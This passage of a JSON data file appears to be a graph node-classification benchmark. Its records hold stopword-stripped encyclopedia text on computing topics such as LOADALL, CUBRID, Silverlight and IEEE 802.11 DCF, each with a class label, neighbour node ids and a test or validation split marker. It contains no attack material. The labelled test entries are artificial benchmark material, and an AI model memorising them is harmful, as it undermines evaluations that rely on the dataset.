environment scientists around world visualize interact collaborate together using hololens devices onsight used mission planning users able program rover activities looking target within simulation using gestures pull select menu commands jpl plans deploy onsight curiosity mission operations using control rover activities july 2015 hololens use hpu uses sensual natural interface commands—gaze gesture voice—sometimes referred ggv inputs gaze commands head-tracking allows user bring application focus whatever user perceiving elements —or virtual application button—are selected using air tap method similar clicking imaginary computer mouse tap held drag simulation move element well voice commands certain commands actions hololens shell carries adapts many elements windows desktop environment bloom gesture accessing shell performing similar function pressing windows key windows keyboard tablet xbox button xbox one controller performed opening one hand fingers spread palm facing windows dragged particular position well resized virtual elements windows menus pinned locations physical structures objects within environment carried fixed relation user following user move around title bars application windows title left buttons window management functions right april 2016 microsoft created microsoft hololens app windows 10 pc windows 10 mobile devices allows developers run apps use phone pc keyboard type text view live stream hololens user point view remotely capture mixed reality photos videos microsoft visual studio ide used develop applications 2d 3d hololens applications tested using hololens emulator included visual studio 2015 ide hololens development edition hololens run almost universal windows platform apps apps appear 2d projections windows 10 apis currently supported hololens cases app able run across windows 10 devices including hololens tools used develop applications windows pc windows phone used develop hololens app 3d applications holographic applications use windows holographic apis microsoft recommends unity engine vuforia create 3d apps hololens also possible developer build engine using directx windows apis",
    "neighbors": [
      259,
      4356,
      5380,
      6150,
      11524,
      6797,
      782,
      1935,
      5262,
      6415,
      10388,
      3605,
      10900,
      11030,
      3224,
      9368,
      11546,
      7325,
      7838,
      7456,
      929,
      5666,
      3875,
      7970,
      10658,
      11559,
      1832,
      3881,
      6441,
      6827,
      7215,
      7983,
      3890,
      11060,
      8757,
      10557,
      7359,
      4289,
      194,
      3527,
      9033,
      6476,
      10957,
      2383,
      4816,
      4051,
      9812,
      11221,
      11605,
      4439,
      7519,
      4704,
      11103,
      4194,
      10338,
      740,
      2919,
      9448,
      617,
      8681,
      1776,
      9585,
      7796,
      6265,
      5754,
      1916,
      2943
    ],
    "mask": "Test"
  },
  {
    "node_id": 11550,
    "label": 3,
    "text": "LOADALL:loadall loadall common name two different undocumented machine instructions intel 80286 intel 80386 processors allow access areas internal processor state normally outside ia-32 api scope like descriptor cache registers loadall 286 processors encoded 0fh 05h loadall 386 processors 0fh 07h variants – name implies – load cpu internal registers one operation loadall unique ability set visible part segment registers selector independently corresponding cached part allowing programmer bring cpu states otherwise allowed official programming model example usefulness techniques loadall set cpu allow access memory real mode without switch unreal mode requires switching protected mode accessing memory finally switching back real mode programs pre-xms versions ramdrive.sys 1985 smartdrv.sys 1986 well himem.sys 2.03 1988-08-04 2.04 1988-08-17 drivers ms-dos uniform software systems extender 1985 connector 1985 lotus 1-2-3 disk 1986 limulator software formerly tele-ware west aka los angeles securities group converted hard disk space extended memory expanded memory os/2 1.0 1.1 used 286 loadall instruction dos 3.3 4.0 reserved 102-byte buffer 0070:0100h normally occupied dos bios data need save restore loadall examination virtual-machine monitor code windows/386 2.10 shows uses 286 even less known 386 variant microsoft himem.sys version 2.06 also used loadall quickly copy extended memory 286 systems another interesting usage loadall laid book design os/2 would allow running former real-mode programs 16-bit protected mode utilized digital research concurrent dos 286 since 1985 well flexos 286 ibm 4680 os since 1986 marking descriptor caches gdt ldts present would allow operating system trap segment-register reloads well attempts performing real-mode–specific segment arithmetic emulate desired behavior updating segment descriptors loadall virtual 8086 mode 80286 however slow practical idea mostly discarded furthermore due errata early intel 80286 processors e-2 stepping result os/2 1.x – windows standard mode well – run dos programs real mode nevertheless idea lost led intel introduce virtual mode 80386 allowing implementation dos boxes last relatively efficient documented way loadall perform checks validity data loaded processor registers possible load processor state could normally entered using real mode pe=0 together paging pg=1 386-class cpus two loadall instructions never documented exist later processors opcodes reused amd64 architecture opcode 286 loadall instruction 0f05 became amd64 instruction syscall 386 loadall instruction 0f07 became sysret instruction definitions cemented even intel cpus introduction intel 64 implementation amd64 in-circuit emulator ice tool used low-level debugging intel 80386 asserting undocumented pin location b6 causes microprocessor halt execution enter ice mode microprocessor saves entire state area memory isolated normal system memory layout area suitable loadall instruction instruction used ice code return normal execution later processors evolved system management mode smm mode rsm instruction used load full cpu state memory area layout memory area similar one used loadall instruction 386-style loadall instruction executed 486 smm mode later processors rsm instruction different encoding took role opcode 0f05 instruction reads data addresses 00800–00866 whatever content segment registers 80286 loadall instruction used switch protected back real mode ca n't clear pe bit msw however use loadall instruction avoid need switch protected mode altogether opcode 0f07 instruction loads data address es edi actually uses es es descriptor",
    "neighbors": [
      5220,
      5380,
      6730,
      8301,
      9166,
      3323,
      7377,
      8115,
      9525,
      5080,
      2201,
      1915,
      6463
    ],
    "mask": "Test"
  },
  {
    "node_id": 11551,
    "label": 1,
    "text": "DUAL_table:dual table dual table special one-row one-column table present default oracle database installations oracle table single varchar2 1 column called dummy value x suitable use selecting pseudo column sysdate user oracle sql syntax requires clause queries n't require tables dual readily used cases charles weiss explains created dual created dual table underlying object oracle data dictionary never meant seen instead used inside view expected queried idea could join dual table create two rows result every one row table using group resulting join could summarized show amount storage data extent index extent name dual seemed apt process creating pair rows one beginning 10g release 1 oracle longer performs physical logical i/o dual table though table still exists dual readily available users database several databases including microsoft sql server mysql postgresql sqlite teradata enable one omit clause entirely table needed avoids need dummy table oracle equivalent “ dual ” table sqlserver",
    "neighbors": [
      6850,
      7523,
      9286,
      5546,
      9389,
      7022,
      10413,
      10737,
      11030,
      8539,
      4604,
      1726
    ],
    "mask": "Test"
  },
  {
    "node_id": 11552,
    "label": 1,
    "text": "CUBRID:cubrid cubrid cube-rid open-source sql-based relational database management system rdbms object extensions developed naver corporation web applications name cubrid combination two words cube bridge cube standing sealed box provides security contents bridge standing data bridge cubrid separate license server engine interfaces server engine adopts gpl v2.0 later license allows distribution modification acquisition source code cubrid apis gui tools berkeley software distribution license obligation opening derivative works reason adopting two separate license systems provide complete freedom independent software vendors isv develop distribute cubrid-based applications feature distinguishes cubrid database relational database systems 3-tier client-server architecture consists database server connection broker application layer database server component cubrid database management system responsible storage operations statement execution cubrid database server instance mount use single database making inter-database queries impossible however one instance run machine unlike solutions database server compile queries executes queries precompiled custom access specification language cubrid connection broker main roles also local object pool enables parts execution deferred database server e.g tuple insertion deletion ddl statements thus lowering database server load since connection broker bound machine database server cubrid take advantage hardware resources several machines processing queries single database applications use one available apis connect cubrid connection broker cubrid high availability provides load-balanced fault-tolerant continuous service availability shared-nothing clustering fail-over fail-back automated mechanisms cubrid 3-tier architecture allows native support high-availability two-level auto failover broker failover server failover connecting broker via client api users specify connection url list alternative hosts brokers listening incoming requests case hardware network operating system software failure one hosts underlying client api automatically fails next host user provided high availability environment built 1 n master-slave server nodes slave node communicates master via cubrid heartbeat protocol master node unresponsive first slave nodes get promoted master role replication nodes achieved one three modes synchronous semi-synchronous asynchronous administrators specify list server hosts broker connect event failure master node another used cubrid provides built-in support database sharding sharding interface implemented special broker called cubrid shard communicating cubrid shard identical communicating normal broker client apis used features normal broker failover load balancing also apply cubrid shard storage implemented separate independent physical databases located separate cubrid server hosts shard fully configured high availability environment data distribution logic among shards lies cubrid shard determines shard use storage retrieval data based hash user defined algorithm cubrid supports online offline incremental backup connection broker configured four different modes read-write read-only slave-only preferred host read list alternative hosts user provided via connection url used method balance load load balancing used client api randomly choose host among specified connection url except one used connect last time chosen host available selection continue hosts determined unavailable case driver report error query execution plan cache implemented broker order skip compilation steps often used queries queries parametrized parsing two queries differ values literal constants share cache entry cubrid support b+-tree indexes single-column multi-column following types indexes created query optimizer use indexes produce faster execution plans using methods cubrid supports horizontal partitioning range hash value lists maximum 1024 partitions per table partitions accessed independently support operations valid normal table version 9.0 cubrid implements execution-time partition pruning cubrid implements large subset ansi standard extended features later sql standards custom features cubrid provides support window functions defined standard implemented functions row_number count min max sum avg stddev_pop stddev_samp var_pop var_samp rank dense_rank lead lag ntile hierarchical queries using non-standard start ... connect oracle syntax supported cubrid number specialized pseudocolumns operators provided controlling behavior query execution cubrid optimizes common scenario web applications database fields need incremented certain events e.g page views contrast usual approach using select/update statement combination cubrid increment fields within select statement execution bypassing expensive compiling execution locking overhead associated update statement stored procedure language supported cubrid java requiring java virtual machine installed system virtual machine started managed server used code execution stored procedure code requires database access must use jdbc driver either using parent transaction issuing new one addition like operator cubrid provides regexp operator regular expression pattern matching default operator case insensitive matching input string modifier binary used case sensitive scenarios optional alias regexp rlike currently cubrid support regexp unicode strings variety data types supported cubrid cubrid available microsoft windows linux distributions 32- 64-bit architectures partial support os x implemented cubrid comes built-in command-line interface named csql used execute sql statements cubrid server tool used one two modes cubrid csql also implements internal commands related schema information plan generation debugging transaction control query timing cubrid provides number language-specific application programming interfaces c driver also called cci cubrid native driver jdbc php/pdo driver odbc oledb ado.net ruby driver python driver node.js driver tcl perl driver several graphical user interface tools developed cubrid applications websites added cubrid support powered cubrid",
    "neighbors": [
      3712,
      11136,
      8582,
      6797,
      10389,
      2456,
      10137,
      5403,
      9245,
      10145,
      2339,
      2344,
      5677,
      10286,
      7983,
      9263,
      692,
      823,
      8644,
      11221,
      9320,
      8554,
      6124,
      5872,
      7412,
      1142,
      1146,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 11553,
    "label": 3,
    "text": "SPARCstation_IPX:sparcstation ipx sparcstation ipx sun 4/50 workstation sold sun microsystems based sun4c architecture enclosed lunchbox chassis sparcstation ipx incorporates fujitsu mb86903 weitek w8701 40 mhz processor weitek sold 80 mhz aftermarket sparc powerup 2000a-080 gcd processor ipx requires rom update v2.9 sparcstation ipx four 72-pin simm slots memory expansion memory uses parity fast page memory fpm simm speeds 50-80ns slots filled individually giving maximum 64mb memory paired memory modules decrease access times via bank interleaving resulting faster memory overall system performance additional 32 64mb sbus board ram expanders fit work ipx using 8-pin j101 header contains additional power clock signals next dma/cache controller sparcstation ipx hold one internal 50 pin idc scsi drive floppy also supports external scsi devices ide/atapi support modern 80 pin single connector attachment sca drives work adapter fit inside case due size adapter sparcstation ipx comes on-board amd lance am7990 ethernet chipset provides aui connection external aui transceivers required connection 10base5 10base2 10baset ethernet physical layer media openboot rom able boot network using rarp tftp like sparcstation systems ipx holds system information mac address serial number nvram battery chip dies system able boot unaided boot parameters entered manually lost power sparcstation ipx includes integrated sun turbo gx cgsix color framebuffer internal sbus frees one sbus slot framebuffer duty makes sparcstation ipx expandable larger form factor sparcstation 2 otherwise shares many architectural similarities sparcstation ipx uses m48t02 battery-backed rtc ram chip handles real time clock boot parameter storage problem chip battery internal means entire chip must replaced battery runs sun4c machines older battery life chip substantial number systems refuse boot additionally sun4c design used reserved bits m48t02 nvram non-standard way since later revisions m48t02 chip exert stricter control bits current m48t02 store nvram data rtc function correctly system may fail auto-boot due incompatibilities modern m48t02s common modify failed nvrams cutting encapsulation patching new battery also possible replace entire encapsulation also contains 32.768 khz clock crystal following operating systems run sparcstation ipx sparcstation ipc sun 4/40 earlier lunchbox form factor system sparcstation 2 sun 4/75 architecturally similar use cpu sbus ram upgrades",
    "neighbors": [
      9665,
      9955,
      10436,
      10982,
      823,
      5498
    ],
    "mask": "Test"
  },
  {
    "node_id": 11554,
    "label": 6,
    "text": "TOPS_(file_server):tops file server tops transcendental operating system peer-to-peer lan-based file sharing system best known macintosh implementation also available dos able interoperate unix nfs originally written centram systems west company purchased sun microsystems part sun development nfs ecosystem centram company renamed tops acquisition sun sales tops dried introduction system 7 featured similar file sharing system built-in sun spun nfs developments sitka tops implemented 1980s era computer system featured networking protocol generally unable talk time apple midst macintosh office effort working two external companies develop apple filing protocol afp built top appletalk macintosh office effort ultimately failed one two companies centram decided implement similar system became first version tops tops originally released peer-to-peer file sharing solution mac according pc magazine connecting mac apple laserwriter printer initial intended function appletalk apple file sharing solution appleshare released later unlike tops required dedicated server machine run least mac plus smaller offices tops attractive low-cost solution saw relatively widespread use even introduction appleshare tops managed hold estimated 600,000 client installs tops initially protocol using custom set remote procedure calls able talk tops clients pcs generally lacked networking sort centram addressed problem introducing line localtalk cards pc along tops client files could exchanged two computers filename conversion required centram later introduced flashtalk networking system used external clocking improve localtalk performance zilog scc powering serial ports mac used internal 3.6864 mhz clock could divided provide different standard bit rates fastest rate available internally 230.4 kbit/s used localtalk however system also allowed clock read pin serial port giving rise possibility faster speeds right external equipment flashtalk combined conventional localtalk-like dongle clocking source external power supply using connectors associated software tops could run 770 kbit/s fairly dramatic improvement localtalk also relatively speedy overall era 1 mbit/s networks still common sun purchase tops given problem making client could also access sun file shares using nfs centram solved problem porting file sharing protocol tcp/ip trivial neither mac os windows supported tcp/ip box tops division sun write complete ip stack mac windows centram already written stack tops terminal freeware open source telnet terminal mac additionally majority macintosh systems used localtalk phonenet connectivity could directly connected ethernet-based unix lans worked around problem supporting emerging localtalk-to-ethernet bridging standard known kip short kinetics internet protocol kip encapsulated tcp/ip packets inside appletalk packets allowing sent existing localtalk connections dedicated kip-supporting network bridges available stripped appletalk packaging re-formed ip packets inside sent ethernet one limitation tcp stack support dns requiring users type ip addresses peers wanted communicate network mostly macs windows pcs issue dns widely used systems time kip also reduced need dns allowed mac existing address resolution protocol aarp code within appletalk look appletalk address remote peer communicate tops stack machine find corresponding ip address tops also added new inbox personal connection e-mail system first developed symantec tops attractiveness seriously eroded introduction system 7 1991 tops initially competed dedicated-server appleshare system 7 included file sharing server built-in one proved much faster then-current versions tops tops sales dwindled sun spun division sitka closing entirely 1993",
    "neighbors": [
      8640,
      9441,
      9569,
      9665,
      11011,
      1734,
      2887,
      11112,
      6377,
      4910,
      8404,
      7706
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11555,
    "label": 9,
    "text": "Wolfram_Language:wolfram language wolfram language general multi-paradigm computational language developed wolfram research programming language mathematical symbolic computation program mathematica wolfram programming cloud emphasizes symbolic computation functional programming rule-based programming employ arbitrary structures data includes built-in functions generating running turing machines creating graphics audio analyzing 3d models matrix manipulations solving differential equations extensively documented wolfram language core principles differentiate programming languages includes built-in knowledgebase automation form meta-algorithms superfunctions coherently elegant design structure built-in natural language understanding representation everything symbolic expression wolfram language released raspberry pi 2013 goal making free raspberry pi users included recommended software bundle raspberry pi foundation provides beginners caused controversy due wolfram language proprietary nature plans port wolfram language intel edison announced board introduction ces 2014 2019 link added make wolfram libraries compatible unity game engine giving game developers access language high level functions language officially named june 2013 although programming language mathematica use various forms 30 years since mathematica initial release 2013 internally referred several names wolfram language possible names wolfram research considered include lingua express stephen wolfram son christopher wolfram involved helping create alien language film arrival used wolfram language given portions written language used wolfram language analyze images attempt interpret served model characters approached problem film beginning 2017 wolfram began live stream internal wolfram language development meetings meetings viewers encouraged submit questions comments related development programming language viewers known suggest new functions would like see developed name new functions help solve complex issues faced stephen wolfram research development team live streamed meetings viewed twitch.tv youtube live facebook live following release version 12 wolfram research developers began live streaming presentations highlight new functionalities directly responsible creating unlike development meetings streamed stephen wolfram presentations streamed exclusively twitch.tv",
    "neighbors": [
      9345,
      6408,
      5521,
      9875,
      7069,
      1443,
      7983,
      5684,
      1591,
      1849,
      6718,
      963,
      10819,
      5830,
      5319,
      8262,
      10568,
      4042,
      8524,
      11219,
      5588,
      2519,
      4057,
      10586,
      219,
      4069,
      6502,
      8421,
      11625,
      5612,
      8430,
      3567,
      1016,
      8057,
      2939,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11556,
    "label": 8,
    "text": "Amazon_Product_Advertising_API:amazon product advertising api amazon product advertising api formerly amazon associates web service a2s known amazon e-commerce service ecs web service application programming interface api gives application programmers access amazon product catalog data accessible via either soap rest protocols enables products listed and/or sold third-party websites applications product amazon services confused amazon web services amazon.com developed product advertising api toward three classifications users api allows clients search browse amazon.com product catalog retrieve detailed product information reviews images interface customer shopping carts purchases amazon third-party website application allows operators site earn 8.5 referral fees motivation behind free product advertising api give partners opportunity earn money promoting amazon products access given developers applications primarily bring least seem potential bring gains amazon",
    "neighbors": [
      8962,
      8451,
      6027,
      5660,
      11038,
      10020,
      2217,
      10681,
      11201,
      5960,
      10185,
      590,
      7248,
      7512,
      8921,
      735,
      1001,
      8181,
      10486
    ],
    "mask": "Test"
  },
  {
    "node_id": 11557,
    "label": 3,
    "text": "Kung-Fu_Master_(video_game):kung-fu master video game kung-fu master side-scrolling beat 'em game produced irem arcade game 1984 distributed data east north america game initially released japan title tie-in based jackie chan film wheels meals also distributed name spartan x japan however game bearing plot film outside names main protagonist girlfriend allowing irem export game without license simply changing title players control thomas titular kung-fu master fights way five levels devil temple order rescue girlfriend sylvia mysterious crime boss mr. x kung-fu master regarded first beat 'em video game nes port titled kung fu sold 3.5 million cartridges arcade game also inspired 1988 french film name player controls thomas four-way joystick two attack buttons punch kick unlike conventional side-scrolling games joystick used crouch also jump punches kicks performed standing crouching jumping position punches award points kicks damage range shorter underlings encountered player include grippers grab thomas drain energy shaken knife throwers throw two different heights must hit twice tom toms short fighters either grab thomas somersault strike head crouching even-numbered floors player must also deal falling balls pots snakes poisonous moths fire-breathing dragons exploding confetti balls devil temple five floors ending different boss described sons devil start game order complete floor thomas must connect enough strikes completely drain boss energy meter climb stairs next floor thomas fixed time limit complete floor time runs meter completely drained player loses one life must replay entire floor upon completing floor player receives bonus points remaining time energy boss fifth floor mr. x leader gang kidnapped sylvia defeated thomas rescues sylvia game restarts higher difficulty level game produced irem takashi nishiyama also created irem 1982 arcade-hit moon patrol later designed original 1987 street fighter capcom leaving run snk videogame development division creating neo geo arcade system board games like art fighting king fighters '94 samurai shodown well several successors game originally based bruce lee 1972 movie game death five-level devil temple reflecting movie setting five-level pagoda martial arts master level however title changed development make tie-in jackie chan spartan x kung-fu master ported atari 2600 atari 7800 amstrad cpc apple ii commodore 64 nes/famicom msx irem/ascii version seiken achō playchoice-10 arcade nearly nes version zx spectrum nes version converted published nintendo kung fu north america pal region also made 8-bit gameking console name nagual arcade version later included along arcade versions 10-yard fight zippy race iac/irem arcade classics playstation sega saturn released japan 1996 irem i'max arcade version released cell phones amstrad cpc zx spectrum versions game included 1986 compilation sold million 3 along fighter pilot ghostbusters rambo arcade sequel called super kung-fu master reportedly planned never released irem 1988 vigilante intended followup gameplay nearly completely different plot added takes place urban areas new york city nameless titular character must save girlfriend madonna maria sega master system version captured skinheads rogues sega master system version one unique feature ability pick use battering weapon nunchaku either player gets hurt finishes stage begin battling final boss 1990 arcade game received completely different game boy sequel titled kung-fu master spartan x japan similar gameplay arcade game completely different plot setting protagonist along new set enemies different stages new bosses including chainsaw man another strongman napalm bomber ninja shinobi mysterious wealthy kung fu master named zapp morgan leader thomas new abilities back-flip kicks small bombs dropped enemies flat levels modified stages different platforms objects urban city style similar vigilante english version modified japanese version changing look thomas renaming bruce leap add small enemies final stage fighting final boss 1991 japan-exclusive sequel game released famicom titled spartan x 2 like vigilante game boy version kung-fu master spartan x 2 plot also quite different takes place urban area mention sylvia rather johnny spartan member unnamed crime-fighting unit wears red short-sleeved jacket charges foiling 6 drug smugglers including punk named flamey joe magician named chin gen sai boatswain strongman named billy bailey circus trainer named mr. benjamin femme fatale named madda lin crime syndicate leader kung fu master named caeson hawk one unique feature ability crouch second either sending uppercut grab throw enemies behind spartan x 2 receive north american release 2016 included built-in title retro-bit generations retro video game console name kung-fu master 2",
    "neighbors": [
      5762,
      10178,
      3623,
      9006,
      10639,
      1776,
      6387,
      10931,
      9303
    ],
    "mask": "None"
  },
  {
    "node_id": 11558,
    "label": 8,
    "text": "Blackle:blackle blackle website powered google custom search created tony heap heap media aims save energy displaying black background using grayish-white font color search results blackle claims saved 7 mwh electrical energy february 2019 claim public dispute comparison average american household consumes 11 mwh electrical energy per year concept behind blackle computer monitors made use less energy displaying much darker colors blackle based study tested variety crt lcd monitors dispute whether really energy saving effects especially users lcd screens constant backlight concept first brought attention heap media blog post estimated google could save 750 megawatt hours year utilizing crt screens homepage blackle provides count number watt hours claimed saved enabling concept",
    "neighbors": [
      488,
      7656,
      4472,
      735
    ],
    "mask": "Test"
  },
  {
    "node_id": 11559,
    "label": 2,
    "text": "Microsoft_Silverlight:microsoft silverlight microsoft silverlight simply silverlight deprecated application framework writing running rich internet applications similar adobe flash plugin silverlight still available browsers early versions silverlight focused streaming media later versions supported multimedia graphics animation game developers support cli languages development tools silverlight also one two application development platforms windows phone web pages use silverlight run windows phone windows mobile versions internet explorer silverlight plugin internet explorer platforms initial launch 2007 reviewers compared product adobe flash according statowl.com microsoft silverlight penetration 64.2 may 2011 usage july 2010 53.6 whereas market leader adobe flash installed 95.3 browsers java supported 76.5 browsers support plugins mutually exclusive one system support three web sites require browser plugin silverlight used provide video streaming nbc coverage 2008 summer olympics beijing 2010 winter olympics vancouver 2008 conventions major united states political parties silverlight also used amazon video netflix instant video streaming services netflix said tech blog 2013 since microsoft announced silverlight end-of-life would moving html5 video industry observers announcing death silverlight early 2011 internally even proponents technology thought extensible application markup language concept bad idea start 2012 microsoft deprecated silverlight html5 windows 8 late beginning 2015 clear microsoft official position future silverlight technology july 2015 microsoft blog post finally clarified matters ... encourage companies using silverlight media begin transition dash/mse/cenc/eme based designs microsoft set overall support end date silverlight 5 october 2021 support ie7-8 removed 2014 2016 depending os support ie9-11 last late 2021 depending os though sic support lifecycle underlying browsers whichever shorter silverlight plugin available microsoft edge supported google chrome since september 2015 firefox since march 2017. fewer 0.1 sites used silverlight 5.3 used adobe flash 2.4 used java silverlight provides retained mode graphics system similar windows presentation foundation wpf integrates multimedia graphics animations interactivity single run-time environment silverlight applications user interfaces declared extensible application markup language xaml programmed using subset .net framework xaml used marking vector graphics animations silverlight also used create windows sidebar gadgets windows vista silverlight supports h.264 video advanced audio coding windows media video wmv windows media audio wma mpeg layer iii mp3 media content across supported browsers without requiring windows media player windows media player activex control windows media browser plug-ins windows media video 9 implementation society motion picture television engineers smpte vc-1 standard silverlight also supports vc-1 video according end user license agreement vc-1 h.264 licensed personal non-commercial use consumer silverlight makes possible dynamically load extensible markup language xml content manipulated document object model dom interface technique consistent conventional ajax techniques silverlight exposes downloader object used download content like scripts media assets data may required application version 2 programming logic written .net language including derivatives common dynamic programming languages like ironruby ironpython free software implementation abandoned named moonlight developed novell cooperation microsoft released bring silverlight versions 1 2 functionality linux freebsd open source platforms although linux distributions include citing redistribution patent concerns however may 2012 moonlight abandoned lack popularity course five years microsoft released five versions varying platform support first version released 2007 fifth final major version may 8 2012 compatible later versions internet explorer web browser microsoft windows except windows rt operating systems safari apple macos mobile devices using windows mobile symbian series 60 platforms cross platform mozilla firefox support silverlight removed firefox 52 released march 2017 mozilla removed support npapi plugins bringing in-line removal npapi plugin support google chrome silverlight requires x86 processor streaming simd extensions sse support supported processors include intel pentium iii amd athlon xp newer amd durons following table presents availability compatibility matrix silverlight versions various operating systems web browsers support opera promised since may 3 2007 david storey chief web opener opera revealed microsoft poster mix conference shown opera integration part silverlight 1.1 however opera never officially supported silverlight linux freebsd functionality available via moonlight pipelight though projects discontinued moonlight available major linux distributions support firefox konqueror opera browsers provided obtained novell miguel de icaza expressed interest working developers operating systems bsd solaris browsers konqueror webkit opera ensure moonlight works fine systems availability moonlight version 1.0 freebsd announced march 2009 since reported actually work current version moonlight 4 preview 1 officially work new versions firefox newer 3.x gnu/linux-based operating systems however installed unofficial way example using add-on compatibility reporter add-on firefox 11 works correctly installed noted moonlight project abandoned may 2012 browser plugin named pipelight used provide silverlight access pipelight requires browser support npapi plugins newer versions firefox chrome opera dropped 2018 pipelight project discontinued silverlight available android ios prevalent operating systems mobile market silverlight primary development environment windows phone based silverlight 4 previous versions windows mobile first community technology preview ctp windows mobile 6 expected second quarter 2008 still officially announced microsoft stopped focusing bringing silverlight windows mobile 6.x nokia announced plans make silverlight mobile available s60 symbian os well series 40 devices nokia internet tablets later sold business microsoft sells android tablets sell alcatel-lucent branded smartphones silverlight mobile supports silverlight 2 content .net languages silverlight windows phone 7.5 based silverlight 4 silverlight applications could written .net programming language development tools used .net languages work silverlight provided target silverlight coreclr hosting application instead .net framework clr microsoft positioned microsoft expression blend companion tool visual studio design silverlight user interface applications visual studio used develop debug silverlight applications create silverlight projects let compiler target coreclr visual studio requires silverlight tools visual studio silverlight control zip format file extension .xap containing list one .net managed assemblies .dll files along appmanifest.xaml file containing list along entry point class assembly hosted html file using object tag example silverlight project contains silverlight.js createsilverlight.js files initializes silverlight plug-in use html pages xaml file ui code-behind files application code silverlight applications debugged manner similar asp.net applications visual studio clr remote cross platform debugging feature used debug silverlight applications running different platform well conjunction release silverlight 2 eclipse added development tool option april 2007 pc world report suggested microsoft intended release certain parts silverlight source code open source software week later sam ramji director platform technology strategy microsoft contradicted rumors confirming company plans open silverlight controls ship silverlight available microsoft public license part separate project known silverlight toolkit silverlight proprietary nature concern competition since may harm open nature world wide web advocates free software also concerned silverlight could another example microsoft embrace extend extinguish strategy microsoft silverlight adobe flash proprietary flash file formats publicly documented standards silverlight silverlight like web technologies uses patent-encumbered audio video codecs mono team abandoned development moonlight free open-source implementation silverlight 1 2 runtimes development discontinued 2012 due poor acceptance silverlight restrictions imposed microsoft project officially supported microsoft agreement novell made not-publicly-available additional specifications access silverlight base class library apis binary codecs test cases available mono team covenant novell granted exclusive access also specified conditions incompatible licensing covers free open source software examples specifically required software must obtained directly novell intermediate recipient must licensed gplv3 similar license free software proponents criticized covenant silverlight criticised living cross-platform operating system compatibility promises especially linux systems compared extensive support apple microsoft desktops internet explorer firefox chrome although microsoft officially collaborating moonlight project bruce chizen ceo adobe systems sells competing proprietary flash platform questioned commitment microsoft keep silverlight platform compatible os besides windows concerns based examples history said microsoft launched products promises ongoing cross-platform compatibility longer apply example internet explorer unix windows media player mac 2007 california several u.s. states asked district judge extend microsoft antitrust case settlement another five years citing number concerns including fear microsoft could use next version windows 'tilt playing field toward silverlight new adobe flash competitor says seattle post-intelligencer article final judgment motion extended settlement two years november 2009 reasons unrelated silverlight",
    "neighbors": [
      10243,
      4624,
      9234,
      1043,
      7701,
      6171,
      2589,
      3102,
      1055,
      10270,
      7713,
      2083,
      8227,
      1577,
      3626,
      2603,
      4143,
      9263,
      1077,
      6709,
      1591,
      8246,
      8757,
      4674,
      8771,
      4174,
      7246,
      4178,
      83,
      9813,
      8281,
      10841,
      603,
      608,
      1632,
      2145,
      10338,
      617,
      5743,
      1136,
      8303,
      8304,
      9841,
      119,
      1656,
      3705,
      5754,
      9848,
      9340,
      5761,
      1666,
      7809,
      9348,
      5765,
      10886,
      2183,
      4231,
      5259,
      653,
      6797,
      10388,
      10900,
      8854,
      10902,
      3224,
      3736,
      11414,
      4771,
      7846,
      6827,
      10414,
      9903,
      9395,
      4289,
      5320,
      10957,
      9424,
      2259,
      3285,
      214,
      4822,
      2777,
      9434,
      736,
      4321,
      6370,
      1252,
      4836,
      4326,
      3303,
      1770,
      10986,
      5356,
      3821,
      11498,
      10991,
      5872,
      4853,
      254,
      4356,
      5380,
      11524,
      1802,
      6411,
      782,
      6927,
      9491,
      11030,
      5401,
      5913,
      7450,
      11546,
      7965,
      11549,
      4384,
      7456,
      7970,
      2854,
      1832,
      10024,
      10026,
      10029,
      7983,
      3890,
      11570,
      823,
      315,
      7486,
      5952,
      1347,
      1348,
      9033,
      844,
      847,
      3413,
      1366,
      11605,
      10079,
      11103,
      2401,
      11616,
      7523,
      11617,
      9579,
      3442,
      2943,
      10624,
      8584,
      9609,
      6028,
      8588,
      1935,
      5526,
      7064,
      3997,
      10654,
      8607,
      11683,
      5543,
      9128,
      4010,
      8618,
      10157,
      430,
      6584,
      10684,
      2493,
      8126,
      4550,
      11212,
      7629,
      4051,
      11221,
      5078,
      8161,
      6114,
      8681,
      9196,
      4590,
      11247,
      499,
      3573,
      9205,
      10229,
      9726,
      5119
    ],
    "mask": "Test"
  },
  {
    "node_id": 11560,
    "label": 5,
    "text": "Distributed_coordination_function:distributed coordination function distributed coordination function dcf fundamental medium access control mac technique ieee 802.11-based wlan standard including wi-fi dcf employs carrier-sense multiple access collision avoidance csma/ca binary exponential backoff algorithm dcf requires station wishing transmit listen channel status difs interval channel found busy difs interval station defers transmission network number stations contend wireless medium multiple stations sense channel busy defer access also virtually simultaneously find channel released try seize channel result collisions may occur order avoid collisions dcf also specifies random backoff forces station defer access channel extra period length backoff period determined following equation formula_1 dcf also optional virtual carrier sense mechanism exchanges short request-to-send rts clear-to-send cts frames source destination stations intervals data frame transmissions dcf includes positive acknowledge scheme means frame successfully received destination addressed destination needs send ack frame notify source successful reception dcf solve hidden terminal and/or exposed terminal problem completely alleviates problem use rts cts recommends use larger carrier sensing range dcf defined subclause 9.3 ieee 802.11 standard de facto default setting wi-fi hardware 802.11 dcf consumes significant amount airtime 802.11 control messages usually convey little information example ack message take 60 μs transmit completely includes amount airtime sufficient transmit 3240 bits 54 mbit/s conveys single bit relevant information ieee 802.11 standard also defines optional access method using point coordination function pcf pcf allows access point acting network coordinator manage channel access ieee 802.11e amendment standard enhances dcf pcf new coordination function called hybrid coordination function hcf",
    "neighbors": [
      10112,
      2785,
      2306,
      388,
      5092,
      8708,
      3847,
      1192,
      5863,
      7498,
      7723,
      9284,
      11181,
      656,
      2802,
      11288,
      2458,
      2911
    ],
    "mask": "None"
  },
  {
    "node_id": 11561,
    "label": 4,
    "text": "Comprehensive_National_Cybersecurity_Initiative:comprehensive national cybersecurity initiative comprehensive national cybersecurity initiative cnci established president george w. bush national security presidential directive 54/homeland security presidential directive 23 nspd-54/hspd-23 january 2008 initiative outlines u.s. cybersecurity goals spans multiple agencies including department homeland security office management budget national security agency initial signing initiative hearings initiative 2008 kept classified however march 2010 obama administration declassified limited material regarding project current goals initiative include establishing front line defense network intrusion defending u.s. full spectrum threats counterintelligence strengthening future cybersecurity environment education coordination research main actions cnci january 6 2011 national security agency nsa began building first series data centers pursuant program 1.5 billion community comprehensive national cybersecurity initiative data center also known utah data center located camp williams utah",
    "neighbors": [
      10859,
      10348,
      7887,
      6645,
      7899,
      5245
    ],
    "mask": "Test"
  },
  {
    "node_id": 11562,
    "label": 2,
